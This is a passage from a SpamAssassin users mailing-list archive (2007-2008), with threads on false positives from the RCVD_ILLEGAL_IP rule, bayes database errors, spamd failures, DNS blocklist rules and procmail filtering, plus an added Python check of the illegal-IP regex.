[29986] dbg: dns: launching DNS A query for linux.interlinx.bc.ca in background
[29986] dbg: async: starting: NO_DNS_FOR_FROM, DNSBL-A, 
dns:A:linux.interlinx.bc.ca (timeout 15.0s, min 3.0s)
[29986] dbg: dns: launching DNS MX query for linux.interlinx.bc.ca in background
[29986] dbg: async: starting: NO_DNS_FOR_FROM, DNSBL-MX, 
dns:MX:linux.interlinx.bc.ca (timeout 15.0s, min 3.0s)
...
[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.bl.open-whois.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.bl.open-whois.org. (timeout 15.0s, min 3.0s)
...
[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.fulldom.rfc-ignorant.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.fulldom.rfc-ignorant.org. (timeout 15.0s, min 3.0s)

I do (believe) I understand trusted_networks and internal_networks and
have them configured for my local installation, but given that Received:
header (which should be a trusted), how is SA to know that it's on the
internal or trusted networks list when it doesn't have the IP address of
the relay in it.  Maybe that is the crux of the problem.

My MTA is Postfix 2.5.1 FWIW.

Any ideas?

b.




Re: RCVD_ILLEGAL_IP question(s)

2008-08-13 Thread Brian Martinez

Folks,

Thanks for your responses thus-far.  It seems that my head is floating in 
the clouds today and I appear to be dreaming half of this situation.  A 
couple of months ago, as I said, our network admin pointed out this 
problem to me.  I can no longer find the email he sent me where he stated 
this and that and the other, nor can I even find my response back to him. 
I remember doing a bunch of "homework" on the issue when I became aware of 
the issue and it has been awhile since I looked upon it again.


Everything I described previous was from memory.  I swear to you all I was 
able to ping one of those IP addresses, and I even remember looking at 
ARIN.  Well it appears that I am dead wrong!  Heh!  I really have no idea 
how I've misinformed myself so badly.  Anyway, I am contacting Consumers 
Energy about the matter now, their postmaster too.


I appreciate all the input, but I guess we can consider this matter 
closed.


Move along, nothing to see here...  ;)
./brm



RCVD_ILLEGAL_IP question(s)

2008-08-13 Thread Brian Martinez

Howdy folks,

I'm experiencing a problem with some people (myself included) who are not 
properly receiving their Consumer's Energy bills.  Rather, the bills are 
being marked as spam and sent into their SPAM folders.  One of the two 
things being marked by the Spam-Report are RCVD_ILLEGAL_IP


I found the function that does the checking for this information in the 
Mail-Spamassassin (or perl-spamassassin-3.2.1-1) package.  We have this 
installed out of RPMs for OpenSuSE 10.2 (both x86 and amd64)


Here is the function:

sub check_for_illegal_ip {
  my ($self, $pms) = @_;

  foreach my $rcvd ( @{$pms->{relays_untrusted}} ) {
    # (note this might miss some hits if the Received.pm skips any invalid IPs)

    foreach my $check ( $rcvd->{ip}, $rcvd->{by} ) {
      # /x: whitespace and line breaks inside the pattern are ignored
      return 1 if ($check =~ /^
        (?:[01257]|(?!127.0.0.)127|22[3-9]|2[3-9]\d|[12]\d{3,}|[3-9]\d\d+)\.\d+\.\d+\.\d+
        $/x);
    }
  }
  return 0;
}

I'm having a hard time understanding the regex myself.  Our network admin 
is actually the person who brought the issue to my attention, I didn't 
even realize I wasn't receiving my own bills and I imagine other folks are 
not either.  Here are the headers from the message with some info REDACTED 
to avoid robots crawling for email addresses.  Our network admin says the 
IP is certainly a legal one, and it pings for us as well as for other 
people.  Anyway, here's another paste:


[begin paste]
Return-path: <[EMAIL PROTECTED]>
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.2.1 (2007-05-02) on 
mx03.mail.msu.edu

X-Spam-Level: *
X-Spam-Status: Yes, score=5.3 required=5.0 tests=INVALID_TZ_EST,
RCVD_ILLEGAL_IP shortcircuit=no autolearn=disabled version=3.2.1
X-Spam-Report:
*  2.1 INVALID_TZ_EST Invalid date in header (wrong EST timezone)
*  3.2 RCVD_ILLEGAL_IP Received: contains illegal IP address
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Fri, 01 Aug 2008 06:15:17 -0400
Received: from mail.consumersenergy.com ([67.59.61.131] 
helo=dmzhpu01.cpco.com)

by mx03.mail.msu.edu with esmtp (Exim 4.63 #1)
id 1KOrfJ-00026T-Cg
for [EMAIL PROTECTED]; Fri, 01 Aug 2008 06:15:17 -0400
Received: from cmsenergy.com ([EMAIL PROTECTED] [1.226.208.65])
by dmzhpu01.cpco.com (8.11.1/8.11.1) with ESMTP id m71AFGJ28409
for <[EMAIL PROTECTED]>; Fri, 1 Aug 2008 06:15:17 -0400 (EDT)
Date: Fri, 1 Aug 2008 05:14:38 -0400 (EST)
From: "eServices" <[EMAIL PROTECTED]>
Subject: Consumers Energy bill ready to view
To: [EMAIL PROTECTED]
Reply-To: "eServices" <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Importance: Normal
X-Priority: 3 (Normal)
X-Mailer: SAP Web Application Server 7.00
Content-Type: text/plain;
 charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Description: Consumers Energy bill ready to view
X-Virus: None found by Clam AV

[end paste]

I'm guessing the IP address in question is: 1.226.208.65

While it certainly is not within a range I see all that often, I am 
assured by our hostmaster that it is legit.  Another one I've seen is 
1.226.208.61


Any ideas on why this is being picked up incorrectly?  Or are we way off 
base, and it is indeed *wrong?*  I am admittedly kind of new to dealing 
with the inner-workings of SpamAssassin.  I took the job as a mail admin 
a couple of years ago, and SA has simply *worked* as setup by the previous 
admin.  I'll be glad to dig around, but I'm still kind of learning it.


Thanks for any ideas.

Regards,
./brm
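Added example, not SpamAssassin's code: the RCVD_ILLEGAL_IP pattern quoted above transcribed into Python's re.VERBOSE (the counterpart of Perl's /x) with each alternative labelled, plus a mirror of the two-level loop over the ip and by fields so the Received: headers above can be checked offline. 1.226.208.65 hits the first alternative: when the 3.2.1 rule was written, 1.0.0.0/8 was still unallocated (IANA assigned it to APNIC in January 2010), so a single-digit first octet of 1 was treated as bogus. The relay dicts are constructed from the headers in the message; the comments and the explain() helper are mine.

```python
import re

# RCVD_ILLEGAL_IP from SpamAssassin 3.2.1, transcribed alternative by alternative.
ILLEGAL_IP_RE = re.compile(r"""^
    (?: [01257]               # single-digit first octet: 0, 1, 2, 5 or 7
      | (?!127.0.0.)127       # 127.x.y.z, except the 127.0.0.* loopback range
      | 22[3-9]               # first octet 223-229
      | 2[3-9]\d              # first octet 230-299
      | [12]\d{3,}            # first octet of four or more digits
      | [3-9]\d\d+            # first octet 300 or more
    )\.\d+\.\d+\.\d+
$""", re.VERBOSE)

# Same alternatives, one at a time, so explain() can say which one fired.
_BRANCHES = [
    ("single-digit first octet 0/1/2/5/7", r"[01257]"),
    ("127.x.y.z outside 127.0.0.*", r"(?!127.0.0.)127"),
    ("first octet 223-229", r"22[3-9]"),
    ("first octet 230-299", r"2[3-9]\d"),
    ("first octet of four or more digits", r"[12]\d{3,}"),
    ("first octet 300 or more", r"[3-9]\d\d+"),
]


def is_illegal_ip(addr):
    return ILLEGAL_IP_RE.search(addr) is not None


def explain(addr):
    """Name of the alternative that matches addr, or None if the rule would not fire."""
    for name, branch in _BRANCHES:
        if re.search(r"^(?:" + branch + r")\.\d+\.\d+\.\d+$", addr):
            return name
    return None


def check_for_illegal_ip(relays_untrusted):
    """Mirror of the Perl loop: both the connecting ip and the receiving host
    of every untrusted relay are tested; a single hit is enough."""
    for rcvd in relays_untrusted:
        for check in (rcvd.get("ip", ""), rcvd.get("by", "")):
            if is_illegal_ip(check):
                return True
    return False


# Constructed from the two Received: headers in the message above.
RELAYS_FROM_MESSAGE = [
    {"ip": "67.59.61.131", "by": "mx03.mail.msu.edu"},
    {"ip": "1.226.208.65", "by": "dmzhpu01.cpco.com"},
]

if __name__ == "__main__":
    print("RCVD_ILLEGAL_IP fires:", check_for_illegal_ip(RELAYS_FROM_MESSAGE))
    for addr in ("1.226.208.65", "1.226.208.61", "127.0.0.1", "127.1.2.3",
                 "224.0.0.1", "10.0.0.1", "67.59.61.131"):
        print(f"{addr:15s} {explain(addr)}")
```

Note that the loop only sees relays_untrusted: a 1.x.y.z hop inside your own trusted_networks would not trigger the rule, which is why the hit here comes from the sender's side of the chain.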


Re: sa-learn error message

2008-01-18 Thread Brian Eliassen

Hello Craig,

I recently ran into this problem myself.  The solution, after being a 
dolt and not running a backup first, was the following sequence 
followed by line definitions:


   /etc/init.d/mailserver stop
   sa-learn --backup > /etc/mail/spamassassin/database.bak
   sa-learn --dump magic
   sa-learn --no-sync --ham --progress --mbox /export/home/brian/Ham
   sa-learn --sync
   sa-learn --no-sync --spam --progress --mbox /export/home/brian/Spam
   sa-learn --sync
   sa-learn --dump magic
   spamassassin -D --lint
   /etc/init.d/mailserver start

1) Shutdown Sendmail/ClamAV/MIMEDefang/Spamassassin.
2) Backup the database.
3) View current statistics which will also display the current bayes 
database version.

4) Do a ham learn.
5) This one was key!  Even after everything was parsed and the 
command line came back, the database was still not in a happy place. 
Doing the --sync brings it to that happy place.

6) Do a spam learn.
7) See #5.
8) View current statistics and note nham and nspam increases.
9) Run through the rules to make sure everything is still cool and no 
errors occur.

10) Start Sendmail/ClamAV/MIMEDefang/Spamassassin.

Notes:

- Doing a --sync on the sa-learn learning process didn't work.  I'm 
not sure why the system doesn't learn the file and then just resync 
the database when it's done.  Maybe Theo has an idea.
- Shutting down the MTA isn't ideal but it prevents lock file 
conflicts which don't seem to work too well under Solaris 8.  Mail 
queues in the ether for about 30 minutes while all of this is going 
on.  I've even thought about automating the process which would help 
keep the Ham and Spam files at a reasonable size and shorten that to 
about 5 minutes.


-BE



Hi again SA experts,

Note the error message in the 2nd-last line of the following transcript:

animalhead:~/sj $ sa-learn --no-rebuild --spam --mbox savejunk
The --no-rebuild option has been deprecated.  Please use --no-sync instead.
Learned tokens from 3025 message(s) (3047 message(s) examined)
animalhead:~/sj $ sa-learn --no-sync --spam thruJunk
bayes: bayes db version 0 is not able to be used, aborting! at 
/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/BayesStore/DBM.pm 
line 196.

Learned tokens from 170 message(s) (170 message(s) examined)

There are 171 messages in directory thruJunk.  The largest is 495K, 
the next largest is 137K.

$ sa-learn -V yields "spamassassin v 3.2.1"

What should I do about this?

I still have another directory with ham to go.  It includes lots of 
large files.  Should I delete those over a certain size?


Thanks,
Craig MacKenna




Telling spamd to give up

2007-11-29 Thread Brian Bebeau

We're using SpamAssassin in our own filter. We call spamd
via the libspamc calls (specifically message_filter() to
do the real work). Everything works fine. Now I need to
figure out how to do large messages ( > 1M). I set the
timeout in the "struct message" struct and it times out
just fine and I can go on and do other things. However,
the spamd process keeps on processing the message, chewing
up CPU and, especially, memory. I can see the timeout happen,
as the log file gets:

Nov 29 16:10:34 developer spamd[1803]:  (child processing
timeout at /usr/bin/spamd line 1246,  line 154408.

10 minutes after it's started, but it still is processing the
message since it continues printing out rules that hit. Is
there some way I can tell spamd that I'm going away now and
it should stop processing the message? If I let it go, it
will eventually lock up my entire computer, not letting me
even move the mouse. Needless to say, that won't fly for
production use. So I could really use some way to tell it
to give up. If the only way is to not scan messages over a
certain size, I guess I'll have to live with that, but I
need to be able to tell TPTB that that's how it has to be.

--
Brian Bebeau
Trustwave
http://www.trustwave.com



Re: debbie-dealz / frosty-saver / got-hyrda / aero-dog spam

2007-09-12 Thread Brian Wilson

On Wed, 12 Sep 2007, Brian Wilson wrote:



I've somehow made it onto a spam list that isn't being picked up by RBLs or by 
bayes.  All messages have a url that looks like this (where X's are all 
digits):


http://aero-dog.com/1-23-28276-45381XXX.html

All messages are originating from 206.131.x.x and I have been submitting them 
to spamcop.  A sample message is here: http://bubba.org/spam/newspam1.txt


Any suggestions for detecting this?  My bayes has been pretty much spot on 
for months, so this has me puzzled.




The sample was older so that is probably why it is being picked up, but 
the newer samples from here are not getting scored from RBLs.  I 
added this URI rule to pick these up:


uri FROSTY_SAVER_URI /^http\:\/\/[\S\-]+\/[\d\-]+.html/
score FROSTY_SAVER_URI 10


I'm sure someone will complain that they have a better regex, but it's 
working for me.


Brian


debbie-dealz / frosty-saver / got-hyrda / aero-dog spam

2007-09-12 Thread Brian Wilson


I've somehow made it onto a spam list that isn't being picked up by RBLs or 
by bayes.  All messages have a url that looks like this (where X's are 
all digits):


http://aero-dog.com/1-23-28276-45381XXX.html

All messages are originating from 206.131.x.x and I have been submitting 
them to spamcop.  A sample message is here: 
http://bubba.org/spam/newspam1.txt


Any suggestions for detecting this?  My bayes has been pretty much spot on 
for months, so this has me puzzled.


Thanks,
Brian





Re: How do I temporarily disable SpamAssassin?

2007-08-19 Thread brian

[EMAIL PROTECTED] wrote:

I have a FreeBSD machine running qmail, SpamAssassin and ClamAV.

I want to temporarily disable SpamAssassin to free up enough
resources to let the mail queue clear.  How do I do that?



Further to the other comments, this page might be helpful:

qmail + spamassassin + clamav quick reference
http://www.rauros.net/projects/qmail/

good luck!




Re: spamd is dying

2007-08-16 Thread brian ally

maillist wrote:

brian ally wrote:


postfix-2.3.3-1
cyrus-imapd-2.2.10-3
spamassassin-3.1.5-1
spamass-milter-0.3.0-1.1.fc2.rf
perl-Mail-SpamAssassin-3.1.5-1

I'm seeing spamd processes dying consistently:

How are you starting spamd?  I think you are starting spamd as a user 
without permissions to /var/spool/spamassassin/bayes.


A script in /etc/init.d (SA was installed as a fedora RPM). The relevant 
lines:

-- snip --
prog="spamd"

# Source networking configuration.
. /etc/sysconfig/network

# Check that networking is up.
[ ${NETWORKING} = "no" ] && exit 0

# Set default spamd configuration.
#SPAMDOPTIONS="-d -c -m5 -H"
SPAMDOPTIONS="-d -m5 -H"
SPAMD_PID=/var/run/spamd.pid

# Source spamd configuration.
if [ -f /etc/sysconfig/spamassassin ] ; then
. /etc/sysconfig/spamassassin
fi

[ -f /usr/bin/spamd -o -f /usr/local/bin/spamd ] || exit 0
PATH=$PATH:/usr/bin:/usr/local/bin

# By default it's all good
RETVAL=0

# See how we were called.
case "$1" in
  start)
# Start daemon.
echo -n $"Starting $prog: "
daemon $NICELEVEL spamd $SPAMDOPTIONS -r $SPAMD_PID
RETVAL=$?
echo
if [ $RETVAL = 0 ]; then
touch /var/lock/subsys/spamassassin
fi
;;
-- snip --

Also, in my experience, that line in your config file should actually be 
changed from:


bayes_path /var/spool/spamassassin/bayes

to:

bayes_path /var/spool/spamassassin/bayes/bayes


Aarghh! Why is this so opaque in the docs? FWIW, google shows 660 pages 
for "bayes" vs. 7 for "bayes/bayes". I'm thinking that it doesn't really 
matter, as long as the daemons can find what's been created.


What about the missing journal? Is that an issue here?


I start spamd like this:

/usr/bin/spamd -r /var/run/spamd.pid \
-d --username=defang --max-spare=8 --min-children=10 --max-children=45



I'll try some of those params. Certainly, I should bump up the 
max-children from 5 and see if that helps.


One thing that just jumped out at me is that this init script has -H, 
which expects a directory as an argument:


 -H [dir], --helper-home-dir[=dir] Specify a different HOME directory

Maybe that has something to do with this. I'll drop it (or should I give 
it "/var/spool/spamassassin"?) and see if that works.


Thanks!

brian



spamd is dying

2007-08-16 Thread brian ally

postfix-2.3.3-1
cyrus-imapd-2.2.10-3
spamassassin-3.1.5-1
spamass-milter-0.3.0-1.1.fc2.rf
perl-Mail-SpamAssassin-3.1.5-1

I'm seeing spamd processes dying consistently:

Aug 13 09:06:07 subtropolix spamd[23480]: bayes: cannot open bayes
databases /var/spool/spamassassin/bayes_* R/O: tie failed: Permission denied
Aug 13 09:06:07 subtropolix spamd[23480]: bayes: locker: safe_lock:
cannot create tmp lockfile
/var/spool/spamassassin/bayes.lock.subtropolix.org.23480 for
/var/spool/spamassassin/bayes.lock: Permission denied
Aug 13 09:06:07 subtropolix spamd[23480]: spamd: clean message
(-0.2/5.0) for filter:5002 in 27.5 seconds, 3069 bytes.
Aug 13 09:06:07 subtropolix spamd[23480]: spamd: result: . 0 - AWL
scantime=27.5,size=3069,user=filter,uid=5002,required_score=5.0,rhost=subtropolix.org,\
raddr=127.0.0.1,rport=35144,mid=<[EMAIL PROTECTED]>,\
autolearn=failed
Aug 13 09:07:40 subtropolix spamc[26720]: connect(AF_INET) to spamd at
127.0.0.1 failed, retrying (#1 of 3): Connection refused

# service spamassassin status
spamd dead but pid file exists
# service spamassassin start
Starting spamd:  [  OK  ]

Here're some lines from maillog from when it's been restarted:


Aug 16 13:09:54 subtropolix spamd[19296]: rules: meta test
DIGEST_MULTIPLE has undefined dependency 'DCC_CHECK'
Aug 16 13:09:59 subtropolix spamd[19296]: spamd: server started on port
783/tcp (running version 3.1.5)
Aug 16 13:09:59 subtropolix spamd[19296]: spamd: server pid: 19296
Aug 16 13:10:18 subtropolix spamd[24919]: bayes: locker: safe_lock:
cannot create tmp lockfile
/var/spool/spamassassin/bayes.lock.subtropolix.org.24919 for
/var/spool/spamassassin/bayes.lock: Permission denied
Aug 16 13:10:18 subtropolix spamd[24919]: spamd: clean message
(-100.9/5.0) for filter:5002 in 18.0 seconds, 117248 bytes.
Aug 16 13:10:18 subtropolix spamd[24919]: spamd: result: . -100 -
AWL,HTML_MESSAGE,USER_IN_WHITELIST\
scantime=18.0,size=117248,user=filter,uid=5002,required_score=5.0,rhost=subtropolix.org,\
raddr=127.0.0.1,rport=53653,mid=<[EMAIL PROTECTED]>,autolearn=failed


I'm also curious about the "autolearn=failed" on that last line.

/etc/postfix/master.cf:
filterunix  -   n   n   -   -   pipe
flags=Rq user=filter argv=/usr/local/anomy/spamc.sh -f ${sender} -- 
${recipient}


local.cf:
rewrite_header Subject [SPAM]
lock_method flock
required_score 5.0
use_bayes 1
bayes_auto_learn 1
bayes_path /var/spool/spamassassin/bayes

# ls -l /var/spool/spamassassin/
total 2723
-rw-------  1 root root  162816 Aug 16 01:20 bayes_seen
-rw-------  1 mail mail 2618368 Aug 16 01:20 bayes_toks

/var spool spamassassin has:
drwxr-xr-x   3 mail mail 2048 Aug 16 01:20 spamassassin

Note there's no journal. I haven't figured out why (nor if it's
important). Does anything jump out at anyone as to why spamd might be
dying like this? I have googled for this but have yet to come across a 
definitive answer.


Re: Blacklist mail

2007-08-16 Thread Brian Godette
Johnson, S wrote:
> The only reason I ask about if I should "learn" the messages is that
> my users have a hard time putting good email into the good email
> folder.  Everyone is quick to put in spam messages though.  My filter
> is getting about 50 to 1 spam to ham right now.  Everything I've
> read/heard states that I should try to be close to 1 to 1 for optimum
> spam hits.  If I add this into the learn then I'll be shooting up the
> filter to close to 100 to 1 (or more).  Should I be worried about
> that?
> 

About the only thing you can do to get more ham learned, without
invading your users' illusion of email privacy, is turn on auto-learning
and adjust bayes_auto_learn_threshold_spam to something reasonably high
since you have a user driven spam feed, and maybe adjust
bayes_auto_learn_threshold_nonspam to be a little more free with what it
considers ham (shouldn't need to though).


Re: Question - How many of you run ALL your email through SA?

2007-08-16 Thread Brian Godette
Marc Perkel wrote:
> As opposed to preprocessing before using SA to reduce the load. (ie. 
> using blacklist and whitelist before SA)
> 

We don't.

We use a locally modified MaRBL that uses weighted scoring, RHSBLs
against helo/sender domain/reverse, and the BOTNET plugin (each
meta-rule gets its own weight), then greylisting (gld policy server),
then clamav w/sane+msrbl, then finally SA. All this does for us is
reduce the load on the spamd servers and bayes database, the amount of
marked spam that would actually get to a user that /dev/null's over a
certain score does not change significantly.

This brings the detected spam rate to about 2% of all delivery attempts
or 14.8% of what SA sees; what the user sees may be much less depending
on what they set their /dev/null score to.

We used to use just greylisting, but it was becoming far less effective
over time (~8 months ago), by adding weighted rbl lookups to reject at
SMTP time and then greylist the rest, the amount of spam as seen by SA
dropped to 12% of what it was with just greylisting alone.

At some point we should add in SPF checks to MaRBL and maybe integrate
p0f from its latest release.



SMTP AUTH problem/question

2007-06-06 Thread Brian C. Hill
I have read the documentation over and over again and
must be missing something. It seems to me that the default
behavior is to give everything that has been through SMTP AUTH
a high negative score, and that I shouldn't have to configure
anything. It isn't working, though. My users don't connect from
trusted networks, which is why they have to SMTP AUTH to relay
mail through my system.

Am I missing something? Will that high negative score
only be applied to SMTP AUTH from trusted nets?

Brian


RE: AWL Troubles

2007-05-07 Thread Brian Wilson

On Mon, 7 May 2007, Abba Communications - www.abbacomm.net wrote:




Thanks for the advice.  Is there a way to view the contents of the AWL?  How
do I remove the table?





Go into your source directory Mail-SpamAssassin-3.2.0/tools and look for 
check_whitelist.  This will dump the contents of your whitelist and show 
you the scores.


You can remove addresses by using spamassassin -R (use --help for other 
whitelist commands).


Or if you want to remove the whole thing, the file (at least for me) is 
called "auto-whitelist" and in ~/.spamassassin but this may depend on 
your auto_whitelist_path variable or may be in a global location.


-B


Re: [AMaViS-user] Most RBL DNS entries are failing

2007-05-01 Thread Brian C. Dilley
I can't resolve them here (tried on two different co-located servers as
well)

On Tue, 2007-05-01 at 21:05 +0200, Oenus Tech Services wrote:

> Hello. I know this is a little off-topic, but I'm having this problem
> and I guess this is a good place to ask for this kind of help. Today,
> 1st of May, I have noticed that most RBL are unavailable, at least from
> many dns servers here in Spain. if I do nslookup or pings to:
> 
> zen.spamhaus.org
> sbl-xbl.spamhaus.org
> pbl.spamhaus.org
> safe.dnsbl.sorbs.net
> list.dsbl.org
> 
> all show as unknown servers.
> 
> I've been able to get queries for ix.dnsbl.manitu.net, dnsbl.njabl.org,
> and bl.spamcop.net occasionally today, so I got their IP addresses in a
> list now.
> 
> Can anybody confirm this?
> 
> If somebody who might get dns queries for those subdomains would be kind
> enough to post their IP addresses, I would really appreciate that.
> 
> TIA,
> 
> Ignacio
> 


Re: RBL tests on MTA vs. RBL rules on SA

2007-04-27 Thread Brian Godette
Oenus Tech Services wrote:
> After much testing, we have decided to put the RBLs on Postfix for
> performance reasons. Before checking with those RBLs, our system does
> EHLO checks against a known-spammer blacklist database as well to filter
> the most obvious cases. Then we use zen.spamhaus.org,
> safe.dnsbl.sorbs.net, and bl.spamcop.net, in this order. Next we do

safe.dnsbl.sorbs.net includes new.spam.dnsbl.sorbs.net which is not very
safe at all. bl.spamcop.net isn't all that safe either. Both will
routinely hit on the free email providers and major ISPs outgoing MTAs.
This is because both have automatic systems generating them.

It's fairly hard for any sizable ISP or mail provider to not constantly
be going on and off new.spam and spamcop lists given harvested/weak
passwords and the newer bots that will use the MTA configured in the
default mail client of the zombied system including being able to do
SMTP-AUTH.

"safe" sorbs would be something along the lines of:
dul.dnsbl.sorbs.net + relays.dnsbl.sorbs.net + zombie.dnsbl.sorbs.net



Re: Alternative to red.uribl.com?

2007-04-06 Thread Brian Wilson


On Apr 6, 2007, at 2:12 AM, Bill Landry wrote:


ram wrote the following on 4/5/2007 10:23 PM -0800:

On Wed, 2007-04-04 at 08:11 -0700, Bill Landry wrote:


ram wrote the following on 4/4/2007 12:56 AM -0800:


On Tue, 2007-04-03 at 13:15 -0700, Bill Landry wrote:



Dave Pooser wrote the following on 4/3/2007 11:19 AM -0800:


I'm seeing a bunch of spam using URLs from domains created on the same day
or in the past day or two. I don't know how red.uribl.com works, but I
imagine it missed the same-day stuff because its automated process needs
time to work. Is there a better way to handle this-- possibly pulling the
information from whois during mail processing? (Although that would be
resource-intensive and would probably run afoul of their prohibition on
high-volume querying, so that's probably a lose.)



Maybe have a look at using "The Day Old Bread List" DNSRBL?  More info
at http://support-intelligence.com/dob/



This seems to be an intelligent idea. Can I subscribe to their DOB lists
alone.

What are the zones to query ?


No subscription necessary to use the DNSRBL service.  Here is how I've
been using their list with SA:

header __RCVD_IN_DOB    eval:check_rbl('dob', 'dob.sibl.support-intelligence.net.', '255')
describe __RCVD_IN_DOB  Received via relay in new domain (Day Old Bread)
tflags __RCVD_IN_DOB    net
score __RCVD_IN_DOB     0

header RCVD_IN_DOB      eval:check_rbl_sub('dob', '127.0.0.2')
describe RCVD_IN_DOB    Received via relay in new domain (Day Old Bread)
tflags RCVD_IN_DOB      net
score RCVD_IN_DOB       1.667

header DNS_FROM_DOB     eval:check_rbl_envfrom('dob','dob.sibl.support-intelligence.net.')
describe DNS_FROM_DOB   Sender from new domain (Day Old Bread)
tflags DNS_FROM_DOB     net
score DNS_FROM_DOB      1.334

urirhssub URIBL_RHS_DOB dob.sibl.support-intelligence.net  A   127.0.0.2
body URIBL_RHS_DOB      eval:check_uridnsbl('URIBL_RHS_DOB')
describe URIBL_RHS_DOB  Contains an URI of a new domain (Day Old Bread)
tflags URIBL_RHS_DOB    net
score URIBL_RHS_DOB     2.75




Is this zone alive ??

I put this in my local.cf since yesterday. Haven't seen a single hit

urirhssub URIBL_RHS_DOB dob.sibl.support-intelligence.net   A   2
body URIBL_RHS_DOB      eval:check_uridnsbl('URIBL_RHS_DOB')
describe URIBL_RHS_DOB  Contains an URI of a new domain (Day Old Bread)
score URIBL_RHS_DOB     1.0


Thanks
Ram


Yep, it's alive.  I got 56 hits on URIBL_RHS_DOB on one of my servers
today.  Try copying what I originally sent to the list instead of your
modified version.

Bill



I can also confirm Bill's unmodified version works like a charm.  8
hits on my single mailbox since yesterday.


Brian


Re: bayes autolearn only on non image mails

2007-03-31 Thread Brian Wilson


On Mar 31, 2007, at 11:06 AM, ram wrote:

Can I configure SA to autolearn only on non image mails. Probably use in
conjunction with the LARGO rulesets

If a mail contains an image, this could probably be an image spam and I
don't want to learn words from here and poison my database

There was a thread last week about it but I could get no answer on the auto
learn issue

Thanks
Ram


This is what I do from .procmailrc.  I have autolearn turned off.

I have a Junk Maildir and Junk/Bad Maildir nested inside of Junk.  I  
never verify things in Bad, and verify everything in Junk.   I can  
manually learn non-Bad things in Junk by dragging to one of my Auto  
folders.  I have Auto/Ham, Auto/HamBayes, Auto/Spam, Auto/SpamBayes.   
A cronjob will take things in these dirs and if they are Ham,  
classify them as such and redeliver them to my Inbox, Spam gets  
classified as Spam and moved to a non-mail directory to be archived.   
The "Bayes" folders are for classifying but not scoring (using a  
homegrown stats program... can't have my numbers getting thrown off).


# if spamassassin thinks it's > 10, lets classify it as spam and mark bad

:0
* ^X-Spam-Checker-Version: SpamAssassin .* on .*\.myhost\.com
* ^X-Spam-Level: \*\*\*\*\*\*\*\*\*\*
{
# learn as spam if > 10 and not image spam
:0c
* ^X-Spam-Status: .*autolearn=disabled.*
* !^Content-Type:.*(multipart/related).*
| $HOME/local/bin/sa-learn --spam --no-sync

# score as successful spam catch
:0ci
| $HOME/bin/sa_score.pl -s

# put in Bad Junk dir.
:0
/home/bdwilson/Maildir/.Junk.Bad/
}

# if < 10 in SA score, don't bayes learn and only put in Junk.
# user can drag to Auto/SpamBayes if it is truly spam to get added to
# bayes without affecting sa_score stats.
:0
* ^X-Spam-Checker-Version: SpamAssassin .* on .*\.myhost\.com
* ^X-Spam-Status: Yes
{
# score as spam catch
:0ci
| $HOME/bin/sa_score.pl -s

# only put in Junk
:0
/home/bdwilson/Maildir/.Junk/
}

# everything else I manually mark as ham. 
 


Re: could someone run these messages....

2007-03-26 Thread Brian Wilson

On Mon, 26 Mar 2007, maillist wrote:



The only tests that they score for me are BAYES_99, which should be enough to 
get them sent to my spam-drop, but they get to the users instead.  When I 
--lint -D I don't see anything that tells me that I have a config problem.


I start spamd this way, as root...

/usr/bin/spamd -r /var/run/spamd.pid \
-d --username=defang --max-spare=5 --min-children=5 --max-children=35

slackware
sendmail 8.14.0
mimedefang 2.61
SpamAssassin version 3.1.8
running on Perl version 5.8.8

What do you score for these emails?
http://securebackend.net/mail_temp/aubrey.txt (I put 2 messages there)

-=Aubrey=-



1st message:

Content analysis details:   (13.1 points, 4.5 required)

 pts rule name  description
 -- --
 7.0 KAM_6C822ECF   $6c822ecf@ VERY prevalent message-ID header in SPAMs
 4.2 BAYES_99   BODY: Bayesian spam probability is 99 to 100%
[score: 1.]
 1.9 RCVD_IN_NJABL_DUL  RBL: NJABL: dialup sender did non-local SMTP
[88.245.62.188 listed in combined.njabl.org]
 0.0 RCVD_IN_PBLRBL: Received via a relay in Spamhaus PBL
[88.245.62.188 listed in zen.spamhaus.org]

2nd message:  BAYES_99 only.




Re: Who is emaildirect.com and CIHost?

2007-03-24 Thread Brian Wilson


On Mar 24, 2007, at 3:35 PM, Gene Heskett wrote:


On Saturday 24 March 2007, jdow wrote:

I was recently on the receiving end of an ssh attack (which had less
chance of success than a nitrocellulose cat in a traditional hell of
succeeding) from CIHost. And now I received a spate of low scoring DKIM
identified spams from emaildirect.com, which is hosted in CIHost's
address range.

O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
 65.98.128.0 - 65.98.255.255
EmailDirect, Inc. NETBLK-65-98-146-0 (NET-65-98-146-0-1)
 65.98.146.0 - 65.98.146.255


Were they legitimate at one time?

{^_^}


Dunno Joanne.  I rather get a charge out of watching the logs in my dd-wrt
router, running on an old x86 box.

When somebody starts a dictionary attack, I might let it run for maybe 30
minutes & then send the admin of record for that registration a please
shut this person down message.  It usually takes 5 minutes to stop.  And
all of them have recently come from the same ISP in tw land.  If it keeps
up, I'll just block that whole class C and be done with it.

Bad puppies, should always be disposed of.



or you could save your time and have a script take care of all that
(http://bubba.org/logact).





Re: Problem with forwarding and SPF

2007-03-19 Thread Brian Wilson


On Mar 19, 2007, at 5:22 AM, Paul Hurley wrote:


Hello all, Happy Pi day for last week...

I'm running Spam Assassin V3.1.7.0 via SAProxy for Win32
(http://sourceforge.net/projects/sawin32/).  I've recently implemented SPF
for my domain, which is working well.  However I have a problem with SPF on
email I receive.  I have a few old email accounts that use forwarding into
my current account.  These generate false SPF failures because of the
forward (see below, this is a recruitment email that is ham to me)


Now I could create a rule for mail received from 172.20.8.86 and a meta
rule that cancelled out mail that hit SPF fails and the received rule, but
that essentially means turning off SPF for that domain.  Any better ideas ?


Thanks

Paul.



This mail is probably spam. The original message
has been attached intact in RFC 822 format.

Content preview:  Employers of Choice Employers of choice New Scientist
  Jobs Employers of Choice are organisations that are searching for the
  best science and technology jobseekers. Do you fit their brief? To find
  out more details and view any current vacancies from the organisations
  below, just click on their logo. To search for a specific job visit
  NewScientistJobs.com [...]

